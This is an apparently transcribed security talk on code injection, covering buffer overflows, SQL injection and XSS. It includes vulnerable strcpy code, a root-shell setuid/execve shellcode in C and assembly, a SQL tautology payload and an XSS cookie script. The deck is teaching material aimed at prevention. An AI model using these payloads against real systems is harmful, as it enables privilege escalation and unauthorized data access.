Code injection occurs when invalid data is injected as code instead of data and executed as part of a program. Common code injection techniques include buffer overflows, SQL injection, and cross-site scripting (XSS). Buffer overflows occur when input length exceeds the buffer size, overwriting the stack and potentially changing the return address. SQL injection happens when unsanitized user input is inserted into SQL queries, allowing manipulation of the database. XSS injects client-side script code by inputting it into a web application. To prevent code injection, developers must never trust unsanitized user input.

1. Application Security: Understanding and Preventing Code injection By Aseem Jakhar

2. About me Open source and security phreak. LinkedIn null.co.in

3. Agenda What is code injection Common Code Injection Techniques Buffer overflow Sql Injection Cross site scripting (XSS)

4. What is code injection ? Every program interfaces with the outer world. Input and Output. Invalid data. Injecting code instead of data and executing it as part of the program.

5. Buffer overflow input length. buffer overflows and overwrites the stack Return address overwritten Return address can be invalid or point back to user input.

6. Function call void foo(int a, int b, ….., int n) Stack growing towards low memory. Caller: push arg n ... push arg b push arg a push return address # eip foo: push ebp (mov esp, ebp) # ebp sub $0x08, esp # Local variables

7. How does the stack look ?

9. Example Vulnerable Code int vul_func(char * src) { char vul_buf[40] = {0}; … strcpy(vul_buf, src); … return 0; }

10. Exploiting buffer overflow Feed the Application, check the registers, return address, shellcode offset/start. Create the Shellcode with stable return address. Test it. Binary pwned!!!

11. Feed the application $perl –e “print ‘A’ x 1000” $echo –en “AAAAAAAAAAAAAAAAAA” Pass the string to the application. Analyze the core dump, check for eip and other registers for 0x41414141 Find the length, offset and valid return address for our shellcode.

12. Example Shellcode: C setuid(0); execve(“/bin/sh”, NULL, NULL); $gcc -static -o shell shell.c $objdump --disassemble shell

13. Example Shellcode: Assembly mov $0xd5,%al # syscall no. for setuid xor %ebx,%ebx # zero out ebx (pass 0 to setuid) int $0x80 # software interrupt xor %eax,%eax # Zero out eax mov $11,%al # syscall no. execve() store it in eax xor %ebx,%ebx # Zero out the contents push %ebx # Push it's value(zero: simple hack to avoid 0s, push $0x68732f2f # push the string(2nd half) push $0x6e69622f # push the string(1st half) STRING == /bin/sh mov %esp,%ebx # 1st argument to execve() adress of 1st char in string xor %ecx,%ecx # 2nd argument to execve() argv = NULL xor %edx,%edx # 3rd argument to execve() envp = NULL int $0x80 $as –o shell.o shell.s && ld –o shell shell.o $objdump –disassemble shell

14. Demo

15. Sql Injection Application sends user input to DB. An SQL query is generated by adding user input directly to a string. Select field from table where value = '$input'; Works perfect for valid input :-)

16. Sql Injection Input meet Bad data! What if $input = foo' or 'a'='a Select field from table where value = 'foo' or 'a'='a'; Voila!!!! Unauthorized access, manipulate DB, delete Tables, input wrong details.

17. Sql Injection

18. XSS Injecting script code. Non-persistent XSS Server reads and reflects the content back foo.com/search.php?q=<script-code> Persistent XSS injected into the Web app. <script>alert(document.cookie)</script>

19. Conclusion Never ever trust user input. Never ever trust user input. Never ever trust user input. Never ever trust user input. Never ever trust user input. Never ever trust user input.

20. Thank You ! Q A? NULL is looking for phreaks Contact: null@null.co.in